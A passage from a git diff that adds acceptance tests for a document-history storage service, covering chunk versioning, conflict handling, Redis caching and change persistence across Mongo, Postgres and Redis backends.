chunkRecords.forEach((chunkRecord, index) => { + expect(chunkRecord.startVersion).to.deep.equal( + expectedChunks[index].getStartVersion() + ) + expect(chunkRecord.endVersion).to.deep.equal( + expectedChunks[index].getEndVersion() + ) + }) + }) + } + + it('returns no chunk records when starting from a version after the last chunk', async function () { + const chunkRecords = [] + for await (const chunk of chunkStore.getProjectChunksFromVersion( + projectId, + 6 + )) { + chunkRecords.push(chunk) + } + expect(chunkRecords).to.have.length(0) + }) + }) + }) + + describe('when saving to object storage fails', function () { + beforeEach(function () { + sinon.stub(historyStore, 'storeRaw').rejects(new Error('S3 Error')) + }) + + afterEach(function () { + historyStore.storeRaw.restore() + }) + + it('does not create chunks', async function () { + const oldEndVersion = 0 + const testPathname = 'foo.txt' + const testTextOperation = TextOperation.fromJSON({ + textOperation: ['a'], + }) // insert an a + + let chunk = await chunkStore.loadLatest(projectId) + expect(chunk.getEndVersion()).to.equal(oldEndVersion) + + const changes = [ + makeChange(Operation.addFile(testPathname, File.fromString(''))), + makeChange(Operation.editFile(testPathname, testTextOperation)), + ] + chunk.pushChanges(changes) + + await expect( + chunkStore.update(projectId, oldEndVersion, chunk) + ).to.be.rejectedWith('S3 Error') + chunk = await chunkStore.loadLatest(projectId) + expect(chunk.getEndVersion()).to.equal(oldEndVersion) + }) + }) + + describe('version checks', function () { + beforeEach(async function () { + // Create a chunk with start version 0, end version 3 + const chunk = makeChunk( + [ + makeChange(Operation.addFile('main.tex', File.fromString('abc'))), + makeChange( + Operation.editFile( + 'main.tex', + TextOperation.fromJSON({ textOperation: [3, 'def'] }) + ) + ), + makeChange( + Operation.editFile( + 'main.tex', + TextOperation.fromJSON({ textOperation: [6, 'ghi'] }) + ) + ), + ], + 0 + ) + await chunkStore.update(projectId, 0, chunk) + }) + + it('refuses to create a chunk with the same start version', async function () { + const chunk = makeChunk( + [makeChange(Operation.addFile('main.tex', File.fromString('abc')))], + 0 + ) + await expect(chunkStore.create(projectId, chunk)).to.be.rejectedWith( + chunkStore.ChunkVersionConflictError + ) + }) + + it("allows creating chunks that don't have version conflicts", async function () { + const chunk = makeChunk( + [makeChange(Operation.addFile('main.tex', File.fromString('abc')))], + 3 + ) + await chunkStore.create(projectId, chunk) + }) + }) + }) + } +}) + +function makeChange(operation, date = new Date()) { + return new Change([operation], date, []) +} + +function makeChunk(changes, versionNumber) { + const snapshot = Snapshot.fromRaw({ files: {} }) + const history = new History(snapshot, []) + const chunk = new Chunk(history, versionNumber) + + chunk.pushChanges(changes) + return chunk +} diff --git a/services/history-v1/test/acceptance/js/storage/chunk_store_mongo_backend.test.js b/services/history-v1/test/acceptance/js/storage/chunk_store_mongo_backend.test.js new file mode 100644 index 0000000..98cdd2d --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/chunk_store_mongo_backend.test.js @@ -0,0 +1,135 @@ +const { expect } = require('chai') +const { ObjectId } = require('mongodb') +const { + Chunk, + Snapshot, + History, + Change, + AddFileOperation, + File, +} = require('overleaf-editor-core') +const cleanup = require('./support/cleanup') +const backend = require('../../../../storage/lib/chunk_store/mongo') +const { ChunkVersionConflictError } = require('../../../../storage') + +describe('chunk store Mongo backend', function () { + beforeEach(cleanup.everything) + + describe('garbage collection', function () { + it('deletes pending and deleted chunks', async function () { + const projectId = new ObjectId().toString() + + // Create a pending chunk + const pendingChunk = makeChunk([], 0) + const pendingChunkId = await backend.insertPendingChunk( + projectId, + pendingChunk + ) + + // Create a deleted chunk + const deletedChunk = makeChunk([], 0) + const deletedChunkId = await backend.insertPendingChunk( + projectId, + deletedChunk + ) + await backend.confirmCreate(projectId, deletedChunk, deletedChunkId) + await backend.deleteChunk(projectId, deletedChunkId) + + // Check that both chunks are ready to be deleted + let oldChunks = await backend.getOldChunksBatch(100, 0) + expect(oldChunks).to.have.deep.members([ + { projectId, chunkId: pendingChunkId }, + { projectId, chunkId: deletedChunkId }, + ]) + + // Delete old chunks + await backend.deleteOldChunks(oldChunks.map(chunk => chunk.chunkId)) + + // Check that there are no more chunks to be deleted + oldChunks = await backend.getOldChunksBatch(100, 0) + expect(oldChunks).to.deep.equal([]) + }) + }) + + describe('concurrency handling', function () { + it('prevents chunks from being created with the same start version', async function () { + const projectId = new ObjectId().toString() + const chunks = [makeChunk([], 10), makeChunk([], 10)] + + const chunkIds = [] + for (const chunk of chunks) { + const chunkId = await backend.insertPendingChunk(projectId, chunk) + chunkIds.push(chunkId) + } + + await backend.confirmCreate(projectId, chunks[0], chunkIds[0]) + await expect( + backend.confirmCreate(projectId, chunks[1], chunkIds[1]) + ).to.be.rejectedWith(ChunkVersionConflictError) + }) + + describe('conflicts between chunk extension and chunk creation', function () { + let projectId, + baseChunkId, + updatedChunkId, + newChunkId, + updatedChunk, + newChunk + + beforeEach(async function () { + projectId = new ObjectId().toString() + const baseChunk = makeChunk([], 0) + baseChunkId = await backend.insertPendingChunk(projectId, baseChunk) + await backend.confirmCreate(projectId, baseChunk, baseChunkId) + + const change = new Change( + [new AddFileOperation('main.tex', File.fromString('hello'))], + new Date() + ) + + updatedChunk = makeChunk([change], 0) + updatedChunkId = await backend.insertPendingChunk( + projectId, + updatedChunk + ) + newChunk = makeChunk([change], 1) + newChunkId = await backend.insertPendingChunk(projectId, newChunk) + }) + + it('prevents creation after extension', async function () { + await backend.confirmUpdate( + projectId, + baseChunkId, + updatedChunk, + updatedChunkId + ) + await expect( + backend.confirmCreate(projectId, newChunk, newChunkId, { + oldChunkId: baseChunkId, + }) + ).to.be.rejectedWith(ChunkVersionConflictError) + }) + + it('prevents extension after creation', async function () { + await backend.confirmCreate(projectId, newChunk, newChunkId, { + oldChunkId: baseChunkId, + }) + await expect( + backend.confirmUpdate( + projectId, + baseChunkId, + updatedChunk, + updatedChunkId + ) + ).to.be.rejectedWith(ChunkVersionConflictError) + }) + }) + }) +}) + +function makeChunk(changes, versionNumber) { + const snapshot = Snapshot.fromRaw({ files: {} }) + const history = new History(snapshot, changes) + const chunk = new Chunk(history, versionNumber) + return chunk +} diff --git a/services/history-v1/test/acceptance/js/storage/chunk_store_postgres_backend.test.js b/services/history-v1/test/acceptance/js/storage/chunk_store_postgres_backend.test.js new file mode 100644 index 0000000..cd1d705 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/chunk_store_postgres_backend.test.js @@ -0,0 +1,110 @@ +const { expect } = require('chai') +const { ObjectId } = require('mongodb') +const { + Chunk, + Snapshot, + History, + Change, + AddFileOperation, + File, +} = require('overleaf-editor-core') +const cleanup = require('./support/cleanup') +const { ChunkVersionConflictError } = require('../../../../storage') +const backend = require('../../../../storage/lib/chunk_store/postgres') + +describe('chunk store Postgres backend', function () { + beforeEach(cleanup.everything) + + it('should reject ObjectId strings as project IDs', async function () { + const invalidProjectId = new ObjectId().toString() + + await expect(backend.getLatestChunk(invalidProjectId)).to.be.rejectedWith( + 'bad projectId' + ) + await expect( + backend.getChunkForVersion(invalidProjectId, 1) + ).to.be.rejectedWith('bad projectId') + await expect( + backend.getChunkForTimestamp(invalidProjectId, new Date()) + ).to.be.rejectedWith('bad projectId') + await expect( + backend.getProjectChunkIds(invalidProjectId) + ).to.be.rejectedWith('bad projectId') + await expect( + backend.insertPendingChunk(invalidProjectId, makeChunk([], 0)) + ).to.be.rejectedWith('bad projectId') + await expect( + backend.confirmCreate(invalidProjectId, makeChunk([], 0), 1) + ).to.be.rejectedWith('bad projectId') + await expect( + backend.confirmUpdate(invalidProjectId, 1, makeChunk([], 0), 2) + ).to.be.rejectedWith('bad projectId') + await expect(backend.deleteChunk(invalidProjectId, 1)).to.be.rejectedWith( + 'bad projectId' + ) + await expect( + backend.deleteProjectChunks(invalidProjectId) + ).to.be.rejectedWith('bad projectId') + }) + + describe('conflicts between chunk extension and chunk creation', function () { + let projectId, + baseChunkId, + updatedChunkId, + newChunkId, + updatedChunk, + newChunk + + beforeEach(async function () { + projectId = '1234' + const baseChunk = makeChunk([], 0) + baseChunkId = await backend.insertPendingChunk(projectId, baseChunk) + await backend.confirmCreate(projectId, baseChunk, baseChunkId) + + const change = new Change( + [new AddFileOperation('main.tex', File.fromString('hello'))], + new Date() + ) + + updatedChunk = makeChunk([change], 0) + updatedChunkId = await backend.insertPendingChunk(projectId, updatedChunk) + newChunk = makeChunk([change], 1) + newChunkId = await backend.insertPendingChunk(projectId, newChunk) + }) + + it('prevents creation after extension', async function () { + await backend.confirmUpdate( + projectId, + baseChunkId, + updatedChunk, + updatedChunkId + ) + await expect( + backend.confirmCreate(projectId, newChunk, newChunkId, { + oldChunkId: baseChunkId, + }) + ).to.be.rejectedWith(ChunkVersionConflictError) + }) + + it('prevents extension after creation', async function () { + await backend.confirmCreate(projectId, newChunk, newChunkId, { + oldChunkId: baseChunkId, + }) + await expect( + backend.confirmUpdate( + projectId, + baseChunkId, + updatedChunk, + updatedChunkId + ) + ).to.be.rejectedWith(ChunkVersionConflictError) + }) + }) +}) + +function makeChunk(changes, versionNumber) { + const snapshot = Snapshot.fromRaw({ files: {} }) + const history = new History(snapshot, []) + const chunk = new Chunk(history, versionNumber) + return chunk +} diff --git a/services/history-v1/test/acceptance/js/storage/chunk_store_redis_backend.test.js b/services/history-v1/test/acceptance/js/storage/chunk_store_redis_backend.test.js new file mode 100644 index 0000000..a4ce4f9 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/chunk_store_redis_backend.test.js @@ -0,0 +1,606 @@ +'use strict' + +const { expect } = require('chai') +const { + Chunk, + Snapshot, + History, + File, + AddFileOperation, + Origin, + Change, + V2DocVersions, +} = require('overleaf-editor-core') +const cleanup = require('./support/cleanup') +const redisBackend = require('../../../../storage/lib/chunk_store/redis') + +describe('chunk store Redis backend', function () { + beforeEach(cleanup.everything) + const projectId = '123456' + + describe('getCurrentChunk', function () { + it('should return null on cache miss', async function () { + const chunk = await redisBackend.getCurrentChunk(projectId) + expect(chunk).to.be.null + }) + + it('should return the cached chunk', async function () { + // Create a sample chunk + const snapshot = new Snapshot() + const changes = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello World'))], + new Date(), + [] + ), + ] + const history = new History(snapshot, changes) + const chunk = new Chunk(history, 5) // startVersion 5 + + // Cache the chunk + await redisBackend.setCurrentChunk(projectId, chunk) + + // Retrieve the cached chunk + const cachedChunk = await redisBackend.getCurrentChunk(projectId) + + expect(cachedChunk).to.not.be.null + expect(cachedChunk.getStartVersion()).to.equal(5) + expect(cachedChunk.getEndVersion()).to.equal(6) + expect(cachedChunk).to.deep.equal(chunk) + }) + }) + + describe('setCurrentChunk', function () { + it('should successfully cache a chunk', async function () { + // Create a sample chunk + const snapshot = new Snapshot() + const changes = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello World'))], + new Date(), + [] + ), + ] + const history = new History(snapshot, changes) + const chunk = new Chunk(history, 5) // startVersion 5 + + // Cache the chunk + await redisBackend.setCurrentChunk(projectId, chunk) + + // Verify the chunk was cached correctly by retrieving it + const cachedChunk = await redisBackend.getCurrentChunk(projectId) + expect(cachedChunk).to.not.be.null + expect(cachedChunk.getStartVersion()).to.equal(5) + expect(cachedChunk.getEndVersion()).to.equal(6) + expect(cachedChunk).to.deep.equal(chunk) + + // Verify that the chunk was stored correctly using the chunk metadata + const chunkMetadata = + await redisBackend.getCurrentChunkMetadata(projectId) + expect(chunkMetadata).to.not.be.null + expect(chunkMetadata.startVersion).to.equal(5) + expect(chunkMetadata.changesCount).to.equal(1) + }) + + it('should correctly handle a chunk with zero changes', async function () { + // Create a sample chunk with no changes + const snapshot = new Snapshot() + const changes = [] + const history = new History(snapshot, changes) + const chunk = new Chunk(history, 10) // startVersion 10 + + // Cache the chunk + await redisBackend.setCurrentChunk(projectId, chunk) + + // Retrieve the cached chunk + const cachedChunk = await redisBackend.getCurrentChunk(projectId) + + expect(cachedChunk).to.not.be.null + expect(cachedChunk.getStartVersion()).to.equal(10) + expect(cachedChunk.getEndVersion()).to.equal(10) // End version should equal start version with no changes + expect(cachedChunk.history.changes.length).to.equal(0) + expect(cachedChunk).to.deep.equal(chunk) + }) + }) + + describe('updating already cached chunks', function () { + it('should replace a chunk with a longer chunk', async function () { + // Set initial chunk with one change + const snapshotA = new Snapshot() + const changesA = [ + new Change( + [ + new AddFileOperation( + 'test.tex', + File.fromString('Initial content') + ), + ], + new Date(), + [] + ), + ] + const historyA = new History(snapshotA, changesA) + const chunkA = new Chunk(historyA, 10) + + await redisBackend.setCurrentChunk(projectId, chunkA) + + // Verify the initial chunk was cached + const cachedChunkA = await redisBackend.getCurrentChunk(projectId) + expect(cachedChunkA.getStartVersion()).to.equal(10) + expect(cachedChunkA.getEndVersion()).to.equal(11) + expect(cachedChunkA.history.changes.length).to.equal(1) + + // Create a longer chunk (with more changes) + const snapshotB = new Snapshot() + const changesB = [ + new Change( + [new AddFileOperation('test1.tex', File.fromString('Content 1'))], + new Date(), + [] + ), + new Change( + [new AddFileOperation('test2.tex', File.fromString('Content 2'))], + new Date(), + [] + ), + new Change( + [new AddFileOperation('test3.tex', File.fromString('Content 3'))], + new Date(), + [] + ), + ] + const historyB = new History(snapshotB, changesB) + const chunkB = new Chunk(historyB, 15) + + // Replace the cached chunk + await redisBackend.setCurrentChunk(projectId, chunkB) + + // Verify the new chunk replaced the old one + const cachedChunkB = await redisBackend.getCurrentChunk(projectId) + expect(cachedChunkB).to.not.be.null + expect(cachedChunkB.getStartVersion()).to.equal(15) + expect(cachedChunkB.getEndVersion()).to.equal(18) + expect(cachedChunkB.history.changes.length).to.equal(3) + expect(cachedChunkB).to.deep.equal(chunkB) + + // Verify the metadata was updated + const updatedMetadata = + await redisBackend.getCurrentChunkMetadata(projectId) + expect(updatedMetadata.startVersion).to.equal(15) + expect(updatedMetadata.changesCount).to.equal(3) + }) + + it('should replace a chunk with a shorter chunk', async function () { + // Set initial chunk with three changes + const snapshotA = new Snapshot() + const changesA = [ + new Change( + [new AddFileOperation('file1.tex', File.fromString('Content 1'))], + new Date(), + [] + ), + new Change( + [new AddFileOperation('file2.tex', File.fromString('Content 2'))], + new Date(), + [] + ), + new Change( + [new AddFileOperation('file3.tex', File.fromString('Content 3'))], + new Date(), + [] + ), + ] + const historyA = new History(snapshotA, changesA) + const chunkA = new Chunk(historyA, 20) + + await redisBackend.setCurrentChunk(projectId, chunkA) + + // Verify the initial chunk was cached + const cachedChunkA = await redisBackend.getCurrentChunk(projectId) + expect(cachedChunkA.getStartVersion()).to.equal(20) + expect(cachedChunkA.getEndVersion()).to.equal(23) + expect(cachedChunkA.history.changes.length).to.equal(3) + + // Create a shorter chunk (with fewer changes) + const snapshotB = new Snapshot() + const changesB = [ + new Change( + [new AddFileOperation('new.tex', File.fromString('New content'))], + new Date(), + [] + ), + ] + const historyB = new History(snapshotB, changesB) + const chunkB = new Chunk(historyB, 30) + + // Replace the cached chunk + await redisBackend.setCurrentChunk(projectId, chunkB) + + // Verify the new chunk replaced the old one + const cachedChunkB = await redisBackend.getCurrentChunk(projectId) + expect(cachedChunkB).to.not.be.null + expect(cachedChunkB.getStartVersion()).to.equal(30) + expect(cachedChunkB.getEndVersion()).to.equal(31) + expect(cachedChunkB.history.changes.length).to.equal(1) + expect(cachedChunkB).to.deep.equal(chunkB) + + // Verify the metadata was updated + const updatedMetadata = + await redisBackend.getCurrentChunkMetadata(projectId) + expect(updatedMetadata.startVersion).to.equal(30) + expect(updatedMetadata.changesCount).to.equal(1) + }) + + it('should replace a chunk with a zero-length chunk', async function () { + // Set initial chunk with changes + const snapshotA = new Snapshot() + const changesA = [ + new Change( + [new AddFileOperation('file1.tex', File.fromString('Content 1'))], + new Date(), + [] + ), + new Change( + [new AddFileOperation('file2.tex', File.fromString('Content 2'))], + new Date(), + [] + ), + ] + const historyA = new History(snapshotA, changesA) + const chunkA = new Chunk(historyA, 25) + + await redisBackend.setCurrentChunk(projectId, chunkA) + + // Verify the initial chunk was cached + const cachedChunkA = await redisBackend.getCurrentChunk(projectId) + expect(cachedChunkA.getStartVersion()).to.equal(25) + expect(cachedChunkA.getEndVersion()).to.equal(27) + expect(cachedChunkA.history.changes.length).to.equal(2) + + // Create a zero-length chunk (with no changes) + const snapshotB = new Snapshot() + const changesB = [] + const historyB = new History(snapshotB, changesB) + const chunkB = new Chunk(historyB, 40) + + // Replace the cached chunk + await redisBackend.setCurrentChunk(projectId, chunkB) + + // Verify the new chunk replaced the old one + const cachedChunkB = await redisBackend.getCurrentChunk(projectId) + expect(cachedChunkB).to.not.be.null + expect(cachedChunkB.getStartVersion()).to.equal(40) + expect(cachedChunkB.getEndVersion()).to.equal(40) // Start version equals end version with no changes + expect(cachedChunkB.history.changes.length).to.equal(0) + expect(cachedChunkB).to.deep.equal(chunkB) + + // Verify the metadata was updated + const updatedMetadata = + await redisBackend.getCurrentChunkMetadata(projectId) + expect(updatedMetadata.startVersion).to.equal(40) + expect(updatedMetadata.changesCount).to.equal(0) + }) + + it('should replace a zero-length chunk with a non-empty chunk', async function () { + // Set initial empty chunk + const snapshotA = new Snapshot() + const changesA = [] + const historyA = new History(snapshotA, changesA) + const chunkA = new Chunk(historyA, 50) + + await redisBackend.setCurrentChunk(projectId, chunkA) + + // Verify the initial chunk was cached + const cachedChunkA = await redisBackend.getCurrentChunk(projectId) + expect(cachedChunkA.getStartVersion()).to.equal(50) + expect(cachedChunkA.getEndVersion()).to.equal(50) + expect(cachedChunkA.history.changes.length).to.equal(0) + + // Create a non-empty chunk + const snapshotB = new Snapshot() + const changesB = [ + new Change( + [new AddFileOperation('newfile.tex', File.fromString('New content'))], + new Date(), + [] + ), + new Change( + [ + new AddFileOperation( + 'another.tex', + File.fromString('Another file') + ), + ], + new Date(), + [] + ), + ] + const historyB = new History(snapshotB, changesB) + const chunkB = new Chunk(historyB, 60) + + // Replace the cached chunk + await redisBackend.setCurrentChunk(projectId, chunkB) + + // Verify the new chunk replaced the old one + const cachedChunkB = await redisBackend.getCurrentChunk(projectId) + expect(cachedChunkB).to.not.be.null + expect(cachedChunkB.getStartVersion()).to.equal(60) + expect(cachedChunkB.getEndVersion()).to.equal(62) + expect(cachedChunkB.history.changes.length).to.equal(2) + expect(cachedChunkB).to.deep.equal(chunkB) + + // Verify the metadata was updated + const updatedMetadata = + await redisBackend.getCurrentChunkMetadata(projectId) + expect(updatedMetadata.startVersion).to.equal(60) + expect(updatedMetadata.changesCount).to.equal(2) + }) + }) + + describe('checkCacheValidity', function () { + it('should return true when versions match', function () { + const snapshotA = new Snapshot() + const historyA = new History(snapshotA, []) + const chunkA = new Chunk(historyA, 10) + chunkA.pushChanges([ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello'))], + new Date(), + [] + ), + ]) + + const snapshotB = new Snapshot() + const historyB = new History(snapshotB, []) + const chunkB = new Chunk(historyB, 10) + chunkB.pushChanges([ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello'))], + new Date(), + [] + ), + ]) + + const isValid = redisBackend.checkCacheValidity(chunkA, chunkB) + expect(isValid).to.be.true + }) + + it('should return false when start versions differ', function () { + const snapshotA = new Snapshot() + const historyA = new History(snapshotA, []) + const chunkA = new Chunk(historyA, 10) + + const snapshotB = new Snapshot() + const historyB = new History(snapshotB, []) + const chunkB = new Chunk(historyB, 11) + + const isValid = redisBackend.checkCacheValidity(chunkA, chunkB) + expect(isValid).to.be.false + }) + + it('should return false when end versions differ', function () { + const snapshotA = new Snapshot() + const historyA = new History(snapshotA, []) + const chunkA = new Chunk(historyA, 10) + chunkA.pushChanges([ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello'))], + new Date(), + [] + ), + ]) + + const snapshotB = new Snapshot() + const historyB = new History(snapshotB, []) + const chunkB = new Chunk(historyB, 10) + chunkB.pushChanges([ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello'))], + new Date(), + [] + ), + new Change( + [new AddFileOperation('other.tex', File.fromString('World'))], + new Date(), + [] + ), + ]) + + const isValid = redisBackend.checkCacheValidity(chunkA, chunkB) + expect(isValid).to.be.false + }) + + it('should return false when cached chunk is null', function () { + const snapshotB = new Snapshot() + const historyB = new History(snapshotB, []) + const chunkB = new Chunk(historyB, 10) + + const isValid = redisBackend.checkCacheValidity(null, chunkB) + expect(isValid).to.be.false + }) + }) + + describe('compareChunks', function () { + it('should return true when chunks are identical', function () { + // Create two identical chunks + const snapshot = new Snapshot() + const changes = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello World'))], + new Date('2025-04-10T12:00:00Z'), // Using fixed date for consistent comparison + [] + ), + ] + const history1 = new History(snapshot, changes) + const chunk1 = new Chunk(history1, 5) + + // Create a separate but identical chunk + const snapshot2 = new Snapshot() + const changes2 = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello World'))], + new Date('2025-04-10T12:00:00Z'), // Using same fixed date + [] + ), + ] + const history2 = new History(snapshot2, changes2) + const chunk2 = new Chunk(history2, 5) + + const result = redisBackend.compareChunks(projectId, chunk1, chunk2) + expect(result).to.be.true + }) + + it('should return false when chunks differ', function () { + // Create first chunk + const snapshot1 = new Snapshot() + const changes1 = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello World'))], + new Date('2025-04-10T12:00:00Z'), + [] + ), + ] + const history1 = new History(snapshot1, changes1) + const chunk1 = new Chunk(history1, 5) + + // Create a different chunk (different content) + const snapshot2 = new Snapshot() + const changes2 = [ + new Change( + [ + new AddFileOperation( + 'test.tex', + File.fromString('Different content') + ), + ], + new Date('2025-04-10T12:00:00Z'), + [] + ), + ] + const history2 = new History(snapshot2, changes2) + const chunk2 = new Chunk(history2, 5) + + const result = redisBackend.compareChunks(projectId, chunk1, chunk2) + expect(result).to.be.false + }) + + it('should return false when one chunk is null', function () { + // Create a chunk + const snapshot = new Snapshot() + const changes = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello World'))], + new Date('2025-04-10T12:00:00Z'), + [] + ), + ] + const history = new History(snapshot, changes) + const chunk = new Chunk(history, 5) + + const resultWithNullCached = redisBackend.compareChunks( + projectId, + null, + chunk + ) + expect(resultWithNullCached).to.be.false + + const resultWithNullCurrent = redisBackend.compareChunks( + projectId, + chunk, + null + ) + expect(resultWithNullCurrent).to.be.false + }) + + it('should return false when chunks have different start versions', function () { + // Create first chunk with start version 5 + const snapshot1 = new Snapshot() + const changes1 = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello World'))], + new Date('2025-04-10T12:00:00Z'), + [] + ), + ] + const history1 = new History(snapshot1, changes1) + const chunk1 = new Chunk(history1, 5) + + // Create second chunk with identical content but different start version (10) + const snapshot2 = new Snapshot() + const changes2 = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello World'))], + new Date('2025-04-10T12:00:00Z'), + [] + ), + ] + const history2 = new History(snapshot2, changes2) + const chunk2 = new Chunk(history2, 10) + + const result = redisBackend.compareChunks(projectId, chunk1, chunk2) + expect(result).to.be.false + }) + }) + + describe('integration with redis', function () { + it('should store and retrieve complex chunks correctly', async function () { + // Create a more complex chunk + const snapshot = new Snapshot() + const changes = [ + new Change( + [new AddFileOperation('file1.tex', File.fromString('Content 1'))], + new Date(), + [1234] + ), + new Change( + [new AddFileOperation('file2.tex', File.fromString('Content 2'))], + new Date(), + null, + new Origin('test-origin'), + ['5a296963ad5e82432674c839', null], + '123.4', + new V2DocVersions({ + 'random-doc-id': { pathname: 'file2.tex', v: 123 }, + }) + ), + new Change( + [new AddFileOperation('file3.tex', File.fromString('Content 3'))], + new Date(), + [] + ), + ] + const history = new History(snapshot, changes) + const chunk = new Chunk(history, 20) + + // Cache the chunk + await redisBackend.setCurrentChunk(projectId, chunk) + + // Retrieve the cached chunk + const cachedChunk = await redisBackend.getCurrentChunk(projectId) + + expect(cachedChunk.getStartVersion()).to.equal(20) + expect(cachedChunk.getEndVersion()).to.equal(23) + expect(cachedChunk).to.deep.equal(chunk) + expect(cachedChunk.history.changes.length).to.equal(3) + + // Check that the operations were preserved correctly + const retrievedChanges = cachedChunk.history.changes + expect(retrievedChanges[0].getOperations()[0].getPathname()).to.equal( + 'file1.tex' + ) + expect(retrievedChanges[1].getOperations()[0].getPathname()).to.equal( + 'file2.tex' + ) + expect(retrievedChanges[2].getOperations()[0].getPathname()).to.equal( + 'file3.tex' + ) + + // Check that the chunk was stored correctly using the chunk metadata + const chunkMetadata = + await redisBackend.getCurrentChunkMetadata(projectId) + expect(chunkMetadata).to.not.be.null + expect(chunkMetadata.startVersion).to.equal(20) + expect(chunkMetadata.changesCount).to.equal(3) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/files/empty.tex b/services/history-v1/test/acceptance/js/storage/files/empty.tex new file mode 100644 index 0000000..e69de29 diff --git a/services/history-v1/test/acceptance/js/storage/files/graph.png b/services/history-v1/test/acceptance/js/storage/files/graph.png new file mode 100644 index 0000000..81dac49 Binary files /dev/null and b/services/history-v1/test/acceptance/js/storage/files/graph.png differ diff --git a/services/history-v1/test/acceptance/js/storage/files/hello.txt b/services/history-v1/test/acceptance/js/storage/files/hello.txt new file mode 100644 index 0000000..80dc915 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/files/hello.txt @@ -0,0 +1 @@ +Olá mundo diff --git a/services/history-v1/test/acceptance/js/storage/files/non_bmp.txt b/services/history-v1/test/acceptance/js/storage/files/non_bmp.txt new file mode 100644 index 0000000..323ec63 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/files/non_bmp.txt @@ -0,0 +1 @@ +􏰁􏰁􏰁􏰁􏰁􏰁􏰁􏰁􏰁􏰁􏰁􏰁􏰁􏰁 diff --git a/services/history-v1/test/acceptance/js/storage/files/null_characters.txt b/services/history-v1/test/acceptance/js/storage/files/null_characters.txt new file mode 100644 index 0000000..4227ca4 Binary files /dev/null and b/services/history-v1/test/acceptance/js/storage/files/null_characters.txt differ diff --git a/services/history-v1/test/acceptance/js/storage/fixtures/chunks.js b/services/history-v1/test/acceptance/js/storage/fixtures/chunks.js new file mode 100644 index 0000000..0fb50e4 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/fixtures/chunks.js @@ -0,0 +1,21 @@ +'use strict' + +const DocFixtures = require('./docs').docs + +exports.chunks = { + chunkOne: { + id: 1000000, + doc_id: DocFixtures.initializedProject.id, + start_version: 0, + end_version: 1, + end_timestamp: new Date('2032-01-01'), + }, +} + +exports.histories = { + chunkOne: { + projectId: DocFixtures.initializedProject.id, + chunkId: '1000000', + json: { snapshot: { files: {} }, changes: [] }, + }, +} diff --git a/services/history-v1/test/acceptance/js/storage/fixtures/docs.js b/services/history-v1/test/acceptance/js/storage/fixtures/docs.js new file mode 100644 index 0000000..f757896 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/fixtures/docs.js @@ -0,0 +1,9 @@ +'use strict' + +// Test docs are no longer inserted in the database. Only their ids are now +// relevant as they are used in history chunks. + +exports.docs = { + uninitializedProject: { id: '1000000' }, + initializedProject: { id: '1000001' }, +} diff --git a/services/history-v1/test/acceptance/js/storage/fixtures/index.js b/services/history-v1/test/acceptance/js/storage/fixtures/index.js new file mode 100644 index 0000000..4f1f74b --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/fixtures/index.js @@ -0,0 +1,7 @@ +'use strict' + +exports.dbSpecs = { + chunks: Object.values(require('./chunks').chunks), + histories: Object.values(require('./chunks').histories), + docs: Object.values(require('./docs').docs), +} diff --git a/services/history-v1/test/acceptance/js/storage/persist_changes.test.js b/services/history-v1/test/acceptance/js/storage/persist_changes.test.js new file mode 100644 index 0000000..aa56dc8 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/persist_changes.test.js @@ -0,0 +1,249 @@ +'use strict' + +const { createHash } = require('node:crypto') +const { expect } = require('chai') + +const cleanup = require('./support/cleanup') +const fixtures = require('./support/fixtures') + +const storage = require('../../../../storage') +const chunkStore = storage.chunkStore +const persistChanges = storage.persistChanges + +const core = require('overleaf-editor-core') +const AddFileOperation = core.AddFileOperation +const EditFileOperation = core.EditFileOperation +const TextOperation = core.TextOperation +const Change = core.Change +const Chunk = core.Chunk +const File = core.File +const History = core.History +const Snapshot = core.Snapshot + +describe('persistChanges', function () { + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + + let farFuture + before(function () { + // used to provide a limit which forces us to persist all of the changes. + farFuture = new Date() + farFuture.setTime(farFuture.getTime() + 7 * 24 * 3600 * 1000) + }) + + it('persists changes', async function () { + const limitsToPersistImmediately = { + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + } + const projectId = fixtures.docs.uninitializedProject.id + const change = new Change( + [new AddFileOperation('test.tex', File.fromString(''))], + new Date(), + [] + ) + const changes = [change] + + await chunkStore.initializeProject(projectId) + const result = await persistChanges( + projectId, + changes, + limitsToPersistImmediately, + 0 + ) + + const history = new History(new Snapshot(), changes) + const currentChunk = new Chunk(history, 0) + expect(result).to.deep.equal({ + numberOfChangesPersisted: 1, + originalEndVersion: 0, + currentChunk, + }) + + const chunk = await chunkStore.loadLatest(projectId) + expect(chunk.getStartVersion()).to.equal(0) + expect(chunk.getEndVersion()).to.equal(1) + expect(chunk.getChanges().length).to.equal(1) + }) + + it('persists changes in two chunks', async function () { + const limitsToPersistImmediately = { + maxChunkChanges: 1, + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + } + const projectId = fixtures.docs.uninitializedProject.id + const firstChange = new Change( + [new AddFileOperation('a.tex', File.fromString(''))], + new Date(), + [] + ) + const secondChange = new Change( + [new AddFileOperation('b.tex', File.fromString(''))], + new Date(), + [] + ) + const changes = [firstChange, secondChange] + + await chunkStore.initializeProject(projectId) + const result = await persistChanges( + projectId, + changes, + limitsToPersistImmediately, + 0 + ) + + const snapshot = Snapshot.fromRaw({ + files: { + 'a.tex': { + content: '', + }, + }, + }) + const 